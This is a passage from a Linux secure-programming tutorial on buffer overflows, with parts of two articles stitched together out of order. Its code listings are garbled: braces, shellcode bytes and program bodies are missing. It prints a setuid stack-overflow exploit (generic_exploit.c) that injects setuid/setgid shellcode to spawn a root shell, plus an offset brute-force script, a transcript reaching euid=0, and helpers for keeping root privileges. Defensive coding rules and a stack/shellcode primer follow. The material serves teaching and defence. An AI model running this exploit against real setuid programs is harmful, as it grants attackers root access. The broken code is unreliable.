The generic_exploit.c program starts allocating the right buffer size , next it copies the shellcode there and fills it up with the addresses and the NOP codes as explained above. It then prepares an argument array and runs the target application using the execve() instruction, this last replacing the current process with the invoked one. The generic_exploit program needs to know the buffer size to exploit (a bit bigger than its size to be able to overwrite the return addresss), the memory offset and the alignment. We indicate if the buffer is passed either as an environment variable (var) or from the command line (novar). The force/noforce argument determines if the call runs the setuid()/setgid() function from the shellcode.

/* generic_exploit.c */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>
#define NOP                     0x90

char shellcode[] =

unsigned long get_sp(void)
   __asm__("movl %esp,%eax");

#define A_BSIZE     1
#define A_OFFSET    2
#define A_ALIGN     3
#define A_VAR       4
#define A_FORCE     5
#define A_PROG2RUN  6
#define A_TARGET    7
#define A_ARG       8

int main(int argc, char *argv[])
   char *buff, *ptr;
   char **args;
   long addr;
   int offset, bsize;
   int i,j,n;
   struct stat stat_struct;
   int align;
   if(argc < A_ARG)
      printf("USAGE: %s bsize offset align (var / novar)
             (force/noforce) prog2run target param\n", argv[0]);
      return -1;
     printf("\nCannot stat %s\n", argv[A_TARGET]);
     return 1;
   bsize  = atoi(argv[A_BSIZE]);
   offset = atoi(argv[A_OFFSET]);
   align  = atoi(argv[A_ALIGN]);

   if(!(buff = malloc(bsize)))
      printf("Can't allocate memory.\n");

   addr = get_sp() + offset;
   printf("bsize %d, offset %d\n", bsize, offset);
   printf("Using address: 0lx%lx\n", addr);

   for(i = 0; i < bsize; i+=4) *(long*)(&buff[i]+align) = addr;

   for(i = 0; i < bsize/2; i++) buff[i] = NOP;

   ptr = buff + ((bsize/2) - strlen(shellcode) - strlen(argv[4]));
       printf("uid %d\n", stat_struct.st_uid);
       *(ptr++)= 0x31;          /* xorl %eax,%eax   */
       *(ptr++)= 0xc0;
       *(ptr++)= 0x31;          /* xorl %ebx,%ebx   */
       *(ptr++)= 0xdb;
       if(stat_struct.st_uid & 0xFF)
     *(ptr++)= 0xb3;        /* movb $0x??,%bl   */
     *(ptr++)= stat_struct.st_uid;
       if(stat_struct.st_uid & 0xFF00)
     *(ptr++)= 0xb7;        /* movb $0x??,%bh   */
     *(ptr++)= stat_struct.st_uid;
       *(ptr++)= 0xb0;          /* movb $0x17,%al   */
       *(ptr++)= 0x17;
       *(ptr++)= 0xcd;          /* int $0x80        */
       *(ptr++)= 0x80;
       printf("gid %d\n", stat_struct.st_gid);
       *(ptr++)= 0x31;          /* xorl %eax,%eax   */
       *(ptr++)= 0xc0;
       *(ptr++)= 0x31;          /* xorl %ebx,%ebx   */
       *(ptr++)= 0xdb;
       if(stat_struct.st_gid & 0xFF)
     *(ptr++)= 0xb3;        /* movb $0x??,%bl   */
     *(ptr++)= stat_struct.st_gid;
       if(stat_struct.st_gid & 0xFF00)
     *(ptr++)= 0xb7;        /* movb $0x??,%bh   */
     *(ptr++)= stat_struct.st_gid;
       *(ptr++)= 0xb0;          /* movb $0x2e,%al   */
       *(ptr++)= 0x2e;
       *(ptr++)= 0xcd;          /* int $0x80        */
       *(ptr++)= 0x80;
   /* Patch shellcode */
   shellcode[13] = shellcode[23] = n + 5;
   shellcode[5] = shellcode[20] = n + 1;
   shellcode[10] = n;
   for(i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i];
   /* Copy prog2run */
   printf("Shellcode will start %s\n", argv[A_PROG2RUN]);

   buff[bsize - 1] = '';

   args = (char**)malloc(sizeof(char*) * (argc - A_TARGET + 3));
   for(i = A_TARGET; i < argc; i++)
     args[j++] = argv[i];
     return execve(args[0],args,NULL);
     return execv(args[0],args);

To benefit from vulnerable.c, we must have a buffer bigger than the one expected by the application. For instance, we select 600 bytes instead of the 500 expected. We find the offset related to the top of the stack by successive tests. The address built with the addr = get_sp() + offset;instruction is used to overwrite the return address, you get it … with a bit of luck ! The operation relies on the heurism that the %esp register won’t move too much during the current process and the one called at the end of the program. Practically, nothing is certain : various events might modify the stack state from the time of the computation to the time the program to exploit is called. Here, we succeeded in activating an exploitable overflow with a -1900 bytes offset. Of course, to complete the experience, the vulnerable target must be Set-UID root.

  $ cc vulnerable.c -o vulnerable
  $ cc generic_exploit.c -o generic_exploit
  $ su
  # chown root.root vulnerable
  # chmod u+s vulnerable
  # exit
  $ ls -l vulnerable
  -rws--x--x   1 root     root        11732 Dec  5 15:50 vulnerable
  $ ./generic_exploit 600 -1900 0 novar noforce /bin/sh ./vulnerable
  bsize 600, offset -1900
  Using address: 0lxbffffe54
  Shellcode will start /bin/sh
  bash# id
  uid=1000(raynal) gid=100(users) euid=0(root) groups=100(users)
  bash# exit
  $ ./generic_exploit 600 -1900 0 novar force /bin/sh /tmp/vulnerable
  bsize 600, offset -1900
  Using address: 0lxbffffe64
  uid 0
  Shellcode will start /bin/sh
  bash# id
  uid=0(root) gid=100(users) groups=100(users)
  bash# exit

In the first case (noforce), our uid doesn’t change. Nevertheless we have a new euid providing us with all the rights. Thus, even if vi says while editing /etc/passwd that it is read only we can still write the file and all the changes will work : you just have to force the writing with w! :) Theforce parameter allows uid=euid=0 from start.

To automatically find offset values for an overflow we can use the following small shell script:

 #! /bin/sh
  while [ $OFFSET -lt $OFFSET_MAX ] ; do
    echo "Offset = $OFFSET"
    ./generic_exploit $BUFFER $OFFSET 0 novar force /bin/sh ./vulnerable
    OFFSET=$(($OFFSET + 4))

In our exploit we didn’t take into account the potential alignment problems. Then, it’s possible that this example doesn’t work for you with the same values, or doesn’t work at all because of the alignment. (For those wanting to test anyway, the alignment parameter has to be changed to 1, 2 or 3 (here, 0). Some systems don’t accept writing in memory areas not being a whole word, but this is not true for Linux.

shell(s) problems

Unfortunately, sometimes the obtained shell is unusable since it ends on its own or when pressing a key. We use another program to keep privileges that we so carefully acquired:

/* set_run_shell.c */
#include <unistd.h>
#include <sys/stat.h>

int main()
  chown ("/tmp/run_shell", geteuid(), getegid());
  chmod ("/tmp/run_shell", 06755);
  return 0;

Since our exploit is only able to do one task at a time, we are going to transfer the rights gained from the run_shell program with the help of theset_run_shell program. We’ll then get the desired shell.

/* run_shell.c */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

int main()
  exit (0);

The -i option corresponds to interactive. Why not giving the rights directly to a shell ? Just because the s bit is not available for every shell. The recent versions check that uid is equal to euid, same for gid and egid. Thus bash2 and tcsh incorporate this defense line, but neither bash, norash have it. This method must be refined when the partition on which run_shell is located (here, /tmp) is mounted nosuid or noexec.


Since we have a Set-UID program with a buffer overflow bug and its source code, we are able to prepare an attack allowing execution of arbitrary code under the ID of the file owner. However, our goal is to avoid security holes. Now we are going to examine a few rules to prevent buffer overflows.

Checking indexes

The first rule to follow is just a matter of good sense : the indexes used to manipulate an array must always be checked carefully. A “clumsy” loop like :

  for (i = 0; i <= n; i ++) {
    table [i] = ...

probably holds an error because of the <= sign instead of < since an access is done beyond the end of the array. If it’s easy to see in that loop, it’s more difficult with a loop using decreasing indexes since you must ensure that you are not going below zero. Apart from the for(i=0; i<n ; i++)trivial case, you must check the algorithm several times (or even ask someone else to check for you), especially when the index is modified inside the loop.

The same type of problem is found with strings : you must always remember to add one more byte for the final null character. One of the newbie’s most frequent mistakes lies in forgetting the string terminator. Worse, it’s hard to diagnose since unpredictable variable alignments (e.g. compiling with debug information) can hide the problem.

Don’t underestimate array indexes as a threat to application security. We have seen (check Phrack issue 55) that only a one byte overflow is enough to create a security hole, inserting the shellcode into an environment variable, for instance.

  #define BUFFER_SIZE 128

  void foo(void) {

    char buffer[BUFFER_SIZE+1];

    /* end of string */
    buffer[BUFFER_SIZE] = '';

    for (i = 0; i<BUFFER_SIZE; i++)
      buffer[i] = ...

Using n functions

As a convention, standard C library functions are aware of the end of the string because of a null byte. For example, the strcpy(3) function copies the original string content into a destination string until it reaches this null byte. In some cases, this behavior becomes dangerous; we have seen the following code contains a security hole :

  #define LG_IDENT 128

  int fonction (const char * name)
    char identity [LG_IDENT];
    strcpy (identity, name);

Functions that limit the copy length avoid this problem These functions have an `n‘ in the middle of their name, for instance strncpy(3) as a replacement for strcpy(3), strncat(3) for strcat(3) or even strnlen(3) for strlen(3).

However, you must be careful with the strncpy(3) limitation since it generates edge effects : when the source string is shorter than the destination one, the copy will be completed with null characters till the n limit and makes the application less performant. On the other hand, if the source string is longer, it will be truncated and the copy will then not end with a null character. Then you must add it manually. Taking this into account, the previous routine becomes :

  #define LG_IDENT 128

  int fonction (const char * name)
    char identity [LG_IDENT+1];
    strncpy (identity, name, LG_IDENT);
    identity [LG_IDENT] = '';

Of course, the same principles apply to routines manipulating wide characters (more than 8 bit), for instance wcsncpy(3) should be prefered towcscpy(3) or wcsncat(3) to wcscat(3). Sure, the program gets bigger but the security improves, too.

Like strcpy(), strcat(3) doesn’t check buffer size. The strncat(3) function adds a character at the end of the string if it finds the room to do it. Replacing strcat(buffer1, buffer2); with strncat(buffer1, buffer2, sizeof(buffer1)-1); eliminates the risk.

The sprintf() function allows to copy formatted data into a string. It also has a version which can check the number of bytes to copy : snprintf(). This function returns the number of characters written into the destination string (without taking into account the `’). Testing this return value tells you if the writing has been done properly :

  if (snprintf(dst, sizeof(dst) - 1, "%s", src) > sizeof(dst) - 1) {
    /* Overflow */

Obviously, this is not worth it anymore as soon as the user gets the control of the number of bytes to copy. Such a hole in BIND (Berkeley Internet Name Daemon) made a lot of crackers busy :

  struct hosten *hp;
  unsigned long address;


  /* copy of an address */
  memcpy(&address, hp->h_addr_list[0], hp->h_length);

This should always copy 4 bytes. Nevertheless, if you can change hp->h_length, then you are able to modify the stack. Accordingly, it’s compulsory to check the data length before copying :

  struct hosten *hp;
  unsigned long address;


  /* test */
  if (hp->h_length > sizeof(address))
    return 0;

  /* copy of an address */
  memcpy(&address, hp->h_addr_list[0], hp->h_length);

In some circumstances it’s impossible to truncate that way (path, hostname, URL…) and things have to be done earlier in the program as soon as data is typed.

Validating the data in two steps

A program running with privileges other than those of its user implies that you protect all data and that you consider all incoming data suspicious.

First of all, this concerns string input routines. According to what we just said, we won’t insist that you never use gets(char *array) since the string length is not checked (authors note : this routine should be forbidden by the link editor for new compiled programs). More insidious risks are hiden in scanf(). The line

scanf ("%s", string)

is as dangerous as gets(char *array), but it isn’t so obvious. But functions from the scanf() family offer a control mechanism on the data size :

  char buffer[256];
  scanf("%255s", buffer);

This formatting limits the number of characters copied into buffer to 255. On the other hand, scanf() puts the characters it doesn’t like back into the incoming stream so the risks of programming errors generating locks are rather high.

Using C++, the cin stream replaces the classical functions used in C (even if you can still use them). The following program fills a buffer :

  char buffer[500];

As you can see, it does no tests ! We are in a situation similar to gets(char *array) while using C : a door is wide open. The ios::width() member function allows to fix the maximum number of characters to read.

The reading of data requires two steps. A first phase consists of getting the string with fgets(char *array, int size, FILE stream), it limits the size of the used memory area. Next, the read data is formatted, through sscanf() for example. The first phase can do more, such as inserting fgets(char *array, int size, FILE stream) into a loop automatically allocating the required memory, without arbitrary limits. The Gnu extension getline() can do that for you. It’s also possible to include typed characters validation using isalnum(), isprint(), etc. The strspn() function allows effective filtering. The program becomes a bit slower, but the code sensitive parts are protected from illegal data with a bulletproof jacket.

Direct data typing is not the only attackable entry point. The software’s data files are vulnerable, but the code written to read them is usually stronger than the one for console input since programmers intuitively don’t trust file content provided by the user.

The buffer overflow attacks often lean on something else : environment strings. We must not forget a programmer can fully configure a process environment before launching it. The convention saying an environment string must be of the “NAME=VALUE” type can be exploited by an ill-intentioned user. Using the getenv() routine requires some caution, especially when it’s about return string length (arbitrarily long) and its content (where you can find any character, `=‘ included). The string returned by getenv() will be treated like the one provided by fgets(char *array, int size, FILE stream), taking care of its length and validating it one character after the other.

Using such filters is done like accessing a computer : default is to forbid everything ! Next, you can allow a few things :

  #define GOOD "abcdefghijklmnopqrstuvwxyz\

  char *my_getenv(char *var) {
    char *data, *ptr

    /* Getting the data */
    data = getenv(var);

    /* Filtering
       Rem : obviously the replacement character must be
             in the list of the allowed ones !!!
    for (ptr = data; *(ptr += strspn(ptr, GOOD));)
      *ptr = '_';

    return data;

The strspn() function makes it easy : it looks for the first character not part of the good character set. It returns the string length (starting from 0) only holding valid characters. You must never reverse the logic. Don’t validate against characters that you don’t want. Always check against the “good” characters.

Using dynamic buffers

Buffer overflow relies on the stack content overwriting a variable and changing the return address of a function. The attack involves automatic data, which only allocated in the stack. A way to move the problem is to replace the characters tables allocated in the stack with dynamic variables found in the heap. To do this we replace the sequence

  #define LG_STRING    128
  int fonction (...)
    char array [LG_STRING];
    return (result);

with :

  #define LG_STRING    128
  int fonction (...)
    char *string = NULL;
    if ((string = malloc (LG_STRING)) == NULL)
        return (-1);
    free (string);
    return (result);

These lines bloat the code and risks memory leaks, but we must take advantage of these changes to modify the approach and avoid imposing arbitrary length limits. Let’s add you can’t expect the same result using the alloca(). The code looks similar but alloca allocates the data in the process stack and that leads to the same problem as automatic variables. Initializing memory to zero using memset() avoids a few problems with uninitialized variables. Again, this doesn’t correct the problem, the exploit just becomes less trivial. Those wanting to carry on with the subject can read the article about Heap overflows from w00w00.

Last, let’s say it’s possible under some circumstances to quickly get rid of security holes by adding the static keyword before the buffer declaration. The compiler allocates this variable in the data segment far from the process stack. It becomes impossible to get a shell, but doesn’t solve the problem of a DoS (Denial of Service) attack. Of course, this doesn’t work if the routine is called recursively. This “medicine” has to be considered as a palliative, only used for eliminating a security hole in an emergency without changing much of the code.


We hope this overview on buffer overflows helps you to program more securely. Even if the exploit technique requires a good understanding of the mechanism, the general principle is rather accessible. On the other hand, the implementation of precautions is not that difficult. Don’t forget it’s faster to make a program secure at design time than to fix the faults later on. We’ll confirm this principle in our next article aboutformat bugs.


Avoiding security holes when developing an application – Part 2: memory, stack and functions, shellcode


This series of articles tries to put the emphasis on the main security holes that can appear within applications. It shows ways to avoid those holes by changing development habits a little.

This article, focuses on memory organization and layout and explains the relationship between a function and memory. The last section shows how to build shellcode.


In our previous article we analyzed the simplest security holes, the ones based on external command execution. This article and the next one show a widespread type of attack, the buffer overflow. First we will study the memory structure of a running application, and then we’ll write a minimal piece of code allowing to start a shell (shellcode).

Memory layout

What is a program?

Let’s assume a program is an instruction set, expressed in machine code (regardless of the language used to write it) that we commonly call a binary. When first compiled to get the binary file, the program source held variables, constants and instructions. This section presents the memory layout of the different parts of the binary.

The different areas

To understand what goes on while executing a binary, let’s have a look at the memory organization. It relies on different areas :

memory layoutThis is generally not all, but we just focus on the parts that are most important for this article.

The command size -A file --radix 16 gives the size of each area reserved when compiling. From that you get their memory addresses (you can also use the command objdump to get this information). Here the output of size for a binary called “fct”:

>>size -A fct --radix 16
fct  :
section            size        addr
.interp            0x13   0x80480f4
.note.ABI-tag      0x20   0x8048108
.hash              0x30   0x8048128
.dynsym            0x70   0x8048158
.dynstr            0x7a   0x80481c8
.gnu.version        0xe   0x8048242
.gnu.version_r     0x20   0x8048250            0x8   0x8048270
.rel.plt           0x20   0x8048278
.init              0x2f   0x8048298
.plt               0x50   0x80482c8
.text             0x12c   0x8048320
.fini              0x1a   0x804844c
.rodata            0x14   0x8048468
.data               0xc   0x804947c
.eh_frame           0x4   0x8049488
.ctors              0x8   0x804948c
.dtors              0x8   0x8049494
.got               0x20   0x804949c
.dynamic           0xa0   0x80494bc
.bss               0x18   0x804955c
.stab             0x978         0x0
.stabstr         0x13f6         0x0
.comment          0x16e         0x0
.note              0x78   0x8049574
Total            0x23c8

The text area holds the program instructions. This area is read-only. It’s shared between every process running the same binary. Attempting to write into this area causes a segmentation violation error.

Before explaining the other areas, let’s recall a few things about variables in C. The global variables are used in the whole program while thelocal variables are only used within the function where they are declared. The static variables have a known size depending on their type when they are declared. Types can be char, int, double, pointers, etc. On a PC type machine, a pointer represents a 32bit integer address within memory. The size of the area pointed to is obviously unknown during compilation. A dynamic variable represents an explicitly allocated memory area – it is really a pointer pointing to that allocated address. global/local, static/dynamic variables can be combined without problems.

Let’s go back to the memory organization for a given process. The data area stores the initialized global static data (the value is provided at compile time), while the bss segment holds the uninitialized global data. These areas are reserved at compile time since their size is defined according to the objects they hold.

What about local and dynamic variables? They are grouped in a memory area reserved for program execution (user stack frame). Since functions can be invoked recursively, the number of instances of a local variable is not known in advance. When creating them, they will be put in the stack. This stack is on top of the highest addresses within the user address space, and works according to a LIFO model (Last In, First Out). The bottom of the user frame area is used for dynamic variables allocation. This area is called heap : it contains the memory areas addressed by pointers and the dynamic variables. When declared, a pointer is a 32bit variable either in BSS or in the stack and does not point to any valid address. When a process allocates memory (i.e. using malloc) the address of the first byte of that memory (also 32bit number) is put into the pointer.

Detailed example

The following example illustrates the variable layout in memory :

/* mem.c */

  int    index = 1;   //in data
  char * str;         //in bss
  int    nothing;     //in bss

void f(char c)
  int i;              //in the stack
  /* Reserves 5 characters in the heap */
  str = (char*) malloc (5 * sizeof (char));
  strncpy(str, "abcde", 5);

int main (void)

The gdb debugger confirms all this.

>>gdb mem
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public
License, and you are welcome to change it and/or distribute
copies of it under certain conditions.  Type "show copying"
to see the conditions.  There is absolutely no warranty
for GDB.  Type "show warranty" for details.  This GDB was
configured as "i386-redhat-linux"...

Let’s put a breakpoint in the f() function and run the program untill this point :

(gdb) list
7      void f(char c)
8      {
9         int i;
10        str = (char*) malloc (5 * sizeof (char));
11        strncpy (str, "abcde", 5);
12     }
14     int main (void)
(gdb) break 12
Breakpoint 1 at 0x804842a: file mem.c, line 12.
(gdb) run
Starting program: mem

Breakpoint 1, f (c=0 '00') at mem.c:12
12      }

We now can see the place of the different variables.

1. (gdb) print &index
$1 = (int *) 0x80494a4
2. (gdb) info symbol 0x80494a4
index in section .data
3. (gdb)  print &nothing
$2 = (int *) 0x8049598
4. (gdb) info symbol 0x8049598
nothing in section .bss
5. (gdb) print str
$3 = 0x80495a8 "abcde"
6. (gdb) info symbol 0x80495a8
No symbol matches 0x80495a8.
7. (gdb) print &str
$4 = (char **) 0x804959c
8. (gdb) info symbol 0x804959c
str in section .bss
9. (gdb) x 0x804959c
0x804959c <str>:     0x080495a8
10. (gdb) x/2x 0x080495a8
0x80495a8: 0x64636261      0x00000065

The command in 1 (print &index) shows the memory address for the index global variable. The second instruction (info) gives the symbol associated to this address and the place in memory where it can be found : index, an initialized global static variable is stored in the data area.

Instructions 3 and 4 confirm that the uninitialized static variable nothing can be found in the BSS segment.

Line 5 displays str … in fact the str variable content, that is the address 0x80495a8. The instruction 6 shows that no variable has been defined at this address. Command 7 allows you to get the str variable address and command 8 indicates it can be found in the BSS segment.

At 9, the 4 bytes displayed correspond to the memory content at address 0x804959c : it’s a reserved address within the heap. The content at 10 shows our string “abcde” :

hexadecimal value : 0x64 63 62 61      0x00000065
character         :    d  c  b  a               e

The local variables c and i are put in the stack.

We notice that the size returned by the size command for the different areas does not match what we expected when looking at our program. The reason is that various other variables declared in libraries appear when running the program (type info variables under gdb to get them all).

The stack and the heap

Each time a function is called, a new environment must be created within memory for local variables and the function’s parameters (hereenvironment means all elements appearing while executing a function : its arguments, its local variables, its return address in the execution stack… this is not the environment for shell variables we mentioned in the previous article). The %esp (extended stack pointer) register holds the top stack address, which is at the bottom in our representation, but we’ll keep calling it top to complete analogy to a stack of real objects, and points to the last element added to the stack; dependent on the architecture, this register may sometimes point to the first free space in the stack.

The address of a local variable within the stack could be expressed as an offset relative to %esp. However, items are always added or removed to/from the stack, the offset of each variable would then need readjustment and that is very ineffecient. The use of a second register allows to improve that : %ebp (extended base pointer) holds the start address of the environment of the current function. Thus, it’s enough to express the offset related to this register. It stays constant while the function is executed. Now it is easy to find the parameters or the local variables within a function.

The stack’s basic unit is the word : on i386 CPUs it’s 32bit, that is 4 bytes. This is different for other architectures. On Alpha CPUs a word is 64 bits. The stack only manages words, that means every allocated variable uses the same word size. We’ll see that with more details in the description of a function prolog. The display of the str variable content using gdb in the previous example illustrates it. The gdb x command displays a whole 32bit word (read it from left to right since it’s a little endian representation).

The stack is usually manipulated with just 2 cpu instructions :

  • push value : this instruction puts the value at the top of the stack. It reduces %esp by a word to get the address of the next word available in the stack, and stores the value given as an argument in that word;
  • pop dest : puts the item from the top of the stack into the ‘dest’. It puts the value held at the address pointed to by %esp in dest and increases the %esp register. To be precise nothing is removed from the stack. Just the pointer to the top of the stack changes.

The registers

What exactly are the registers? You can see them as drawers holding only one word, while memory is made of a series of words. Each time a new value is put in a register, the old value is lost. Registers allow direct communication between memory and CPU.

The first ‘e‘ appearing in the registers name means “extended” and indicates the evolution between old 16bit and present 32bit architectures.

The registers can be divided into 4 categories :

  1. general registers : %eax, %ebx, %ecx and %edx are used to manipulate data;
  2. segment registers : 16bit %cs, %ds, %esx and %ss, hold the first part of a memory address;
  3. offset registers : they indicate an offset related to segment registers :
    • %eip (Extended Instruction Pointer) : indicates the address of the next instruction to be executed;
    • %ebp (Extended Base Pointer) : indicates the beginning of the local environment for a function;
    • %esi (Extended Source Index) : holds the data source offset in an operation using a memory block;
    • %edi (Extended Destination Index) : holds the destination data offset in an operation using a memory block;
    • %esp (Extended Stack Pointer) : the top of the stack;
  4. special registers : they are only used by the CPU.

Note: everything said here about registers is very x86 oriented but alpha, sparc, etc have registers with different names but similar functionality.

The functions


This section presents the behavior of a program from call to finish. Along this section we’ll use the following example :

/* fct.c */

void toto(int i, int j)
  char str[5] = "abcde";
  int k = 3;
  j = 0;

int main(int argc, char **argv)
  int i = 1;
  toto(1, 2);
  i = 0;

The purpose of this section is to explain the behavior of the above functions regarding the stack and the registers. Some attacks try to change the way a program runs. To understand them, it’s useful to know what normally happens.

Running a function is divided into three steps :

  1. the prolog : when entering a function, you already prepare the way out of it, saving the stack’s state before entering the function and reserving the needed memory to run it;
  2. the function call : when a function is called, its parameters are put into the stack and the instruction pointer (IP) is saved to allow the instruction execution to continue from the right place after the function;
  3. the function return : to put things back as they were before calling the function.

The prolog

A function always starts with the instructions :

push   %ebp
mov    %esp,%ebp
push   $0xc,%esp       //$0xc depends on each program

These three instructions make what is called the prolog. The diagram 1 details the way the toto() function prolog works explaining the %ebpand %esp registers parts :

Diag. 1 : prolog of a function
prolog Initially, %ebp points in the memory to any X address. %esp is lower in the stack, at Y address and points to the last stack entry. When entering a function, you must save the beginning of the “current environment”, that is %ebp. Since %ebp is put into the stack, %esp decreases by a memory word.
environment This second instruction allows building a new “environment” for the function, putting %ebp on the top of the stack. %ebp and%esp then pointing to the same memory word which holds the previous environment address.
stack space for local variables Now the stack space for local variables has to be reserved. The character array is defined with 5 items and needs 5 bytes (a char is one byte). However the stack only manages words, and can only reserve multiples of a word (1 word, 2 words, 3words, …). To store 5 bytes in the case of a 4 bytes word, you must use 8 bytes (that is 2 words). The grayed part could be used, even if it is not really part of the string. The k integer uses 4 bytes. This space is reserved by decreasing the value of %esp by 0xc (12 in hexadecimal). The local variables use 8+4=12 bytes (i.e. 3 words).

Apart from the mechanism itself, the important thing to remember here is the local variables position : the local variables have a negativeoffset when related to %ebp. The i=0 instruction in the main() function illustrates this. The assembly code (cf. below) uses indirect addressing to access the i variable :

0x8048411 <main+25>:    movl   $0x0,0xfffffffc(%ebp)

The 0xfffffffc hexadecimal represents the -4 integer. The notation means put the value 0 into the variable found at “-4 bytes” relatively to the%ebp register. i is the first and only local variable in the main() function, therefore its address is 4 bytes (i.e. integer size) “below” the %ebpregister.

The call

Just like the prolog of a function prepares its environment, the function call allows this function to receive its arguments, and once terminated, to return to the calling function.

As an example, let’s take the toto(1, 2); call.

Diag. 2 : Function call
argument on stack Before calling a function, the arguments it needs are stored in the stack. In our example, the two constant integers 1 and 2 are first stacked, beginning with the last one. The %eip register holds the address of the next instruction to execute, in this case the function call.
call When executing the call instruction, %eip takes the address value of the following instruction found 5 bytes after (call is a 5 byte instruction – every instruction doesn’t use the same space depending on the CPU). The call then saves the address contained in %eip to be able to go back to the execution after running the function. This “backup” is done from an implicit instruction putting the register in the stack :

    push %eip

The value given as an argument to call corresponds to the address of the first prolog instruction from the toto() function. This address is then copied to %eip, thus it becomes the next instruction to execute.

Once we are in the function body, its arguments and the return address have a positive offset when related to %ebp, since the next instruction puts this register to the top of the stack. The j=0 instruction in the toto() function illustrates this. The Assembly code again uses indirect addressing to access the j :

0x80483ed <toto+29>:    movl   $0x0,0xc(%ebp)

The 0xc hexadecimal represents the +12 integer. The notation used means put the value 0 in the variable found at “+12 bytes” relatively to the%ebp register. j is the function’s second argument and it’s found at 12 bytes “on top” of the %ebp register (4 for instruction pointer backup, 4 for the first argument and 4 for the second argument – cf. the first diagram in the return section)

The return

Leaving a function is done in two steps. First, the environment created for the function must be cleaned up (i.e. putting %ebp and %eip back as they were before the call). Once this done, we must check the stack to get the information related to the function we are just coming out off.

The first step is done within the function with the instructions :


The next one is done within the function where the call took place and consists of cleaning up the stack from the arguments of the called function.

We carry on with the previous example of the toto() function.

Diag. 3 : Function return
initial situation Here we describe the initial situation before the call and the prolog. Before the call, %ebp was at address X and %esp at address Y . >From there we stacked the function arguments, saved %eip and %ebp and reserved some space for our local variables. The next executed instruction will be leave.
leave The instruction leave is equivalent to the sequence :

    mov ebp esp
    pop ebp

The first one takes %esp and %ebp back to the same place in the stack. The second one puts the top of the stack in the %ebpregister. In only one instruction (leave), the stack is like it would have been without the prolog.

restore The ret instruction restores %eip in such a way the calling function execution starts back where it should, that is after the function we are leaving. For this, it’s enough to unstack the top of the stack in %eip.We are not yet back to the initial situation since the function arguments are still stacked. Removing them will be the next instruction, represented with its Z+5 address in %eip (notice the instruction addressing is increasing as opposed to what’s happening on the stack).
stacking of parameters The stacking of parameters is done in the calling function, so is it for unstacking. This is illustrated in the opposite diagram with the separator between the instructions in the called function and the add 0x8, %esp in the calling function. This instruction takes %esp back to the top of the stack, as many bytes as the toto() function parameters used. The %ebp and%esp registers are now in the situation they were before the call. On the other hand, the %eip instruction register moved up.


gdb allows to get the Assembly code corresponding to the main() and toto() functions :

>>gcc -g -o fct fct.c
>>gdb fct
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.  GDB is free
software, covered by the GNU General Public License, and
you are welcome to change it and/or distribute copies of
it under certain conditions.  Type "show copying" to see
the conditions.  There is absolutely no warranty for GDB.
Type "show warranty" for details.  This GDB was configured
as "i386-redhat-linux"...
(gdb) disassemble main                    //main
Dump of assembler code for function main:

0x80483f8 <main>:    push   %ebp //prolog
0x80483f9 <main+1>:  mov    %esp,%ebp
0x80483fb <main+3>:  sub    $0x4,%esp

0x80483fe <main+6>:  movl   $0x1,0xfffffffc(%ebp)

0x8048405 <main+13>: push   $0x2 //call
0x8048407 <main+15>: push   $0x1
0x8048409 <main+17>: call   0x80483d0 <toto>

0x804840e <main+22>: add    $0x8,%esp //return from toto()

0x8048411 <main+25>: movl   $0x0,0xfffffffc(%ebp)
0x8048418 <main+32>: mov    0xfffffffc(%ebp),%eax

0x804841b <main+35>: push   %eax     //call
0x804841c <main+36>: push   $0x8048486
0x8048421 <main+41>: call   0x8048308 <printf>

0x8048426 <main+46>: add    $0x8,%esp //return from printf()
0x8048429 <main+49>: leave            //return from main()
0x804842a <main+50>: ret

End of assembler dump.
(gdb) disassemble toto                    //toto
Dump of assembler code for function toto:

0x80483d0 <toto>:     push   %ebp   //prolog
0x80483d1 <toto+1>:   mov    %esp,%ebp
0x80483d3 <toto+3>:   sub    $0xc,%esp

0x80483d6 <toto+6>:   mov    0x8048480,%eax
0x80483db <toto+11>:  mov    %eax,0xfffffff8(%ebp)
0x80483de <toto+14>:  mov    0x8048484,%al
0x80483e3 <toto+19>:  mov    %al,0xfffffffc(%ebp)
0x80483e6 <toto+22>:  movl   $0x3,0xfffffff4(%ebp)
0x80483ed <toto+29>:  movl   $0x0,0xc(%ebp)
0x80483f4 <toto+36>:  jmp    0x80483f6 <toto+38>

0x80483f6 <toto+38>:  leave         //return from toto()
0x80483f7 <toto+39>:  ret

End of assembler dump.

The instructions without color correspond to our program instructions, such as assignment for instance.

Creating a shellcode

In some cases, it’s possible to act on the process stack content, by overwriting the return address of a function and making the application execute some arbitrary code. This is especially interesting for a cracker if the application runs under an ID different from the user’s one (Set-UID program or daemon). This type of mistake is particularly dangerous if an application like a document reader is started by another user. The famous Acrobat Reader bug, where a modified document was able to start a buffer overflow. It also works for network services (ie : imap).

In future articles, we’ll talk about mechanisms used to execute instructions. Here we start studying the code itself, the one we want to be executed from the main application. The simplest solution is to have a piece of code to run a shell. The reader can then perform other actions such as changing the /etc/passwd file permission. For reasons which will be obvious later, this program must be done in Assembly language. This type of small program which is used to run a shell is usually called shellcode.

The examples mentioned are inspired from Aleph One’s article “Smashing the Stack for Fun and Profit” from the Phrack magazine number 49.

With C language

The goal of a shellcode is to run a shell. The following C program does this :

/* shellcode1.c */

    #include <stdio.h>
    #include <unistd.h>

int main()
  char * name[] = {"/bin/sh", NULL};
  execve(name[0], name, NULL);
  return (0);

Among the set of functions able to call a shell, many reasons recommend the use of execve(). First, it’s a true system-call, unlike the other functions from the exec() family, which are in fact GlibC library functions built from execve(). A system-call is done from an interrupt. It suffices to define the registers and their content to get an effective and short Assembly code.

Moreover, if execve() succeeds, the calling program (here the main application) is replaced with the executable code of the new program and starts. When the execve() call fails, the program execution goes on. In our example, the code is inserted in the middle of the attacked application. Going on with execution would be meaningless and could even be disastrous. The execution then must end as quickly as possible. A return (0) allows exiting a program only when this instruction is called from the main() function, this is is unlikely here. We then must force termination through the exit() function.

/* shellcode2.c */

    #include <stdio.h>
    #include <unistd.h>

int main()
  char * name [] = {"/bin/sh", NULL};
  execve (name [0], name, NULL);
  exit (0);

In fact, exit() is another library function that wraps the real system-call _exit(). A new change brings us closer to the system :

/* shellcode3.c */
    #include <unistd.h>
    #include <stdio.h>

int main()
  char * name [] = {"/bin/sh", NULL};
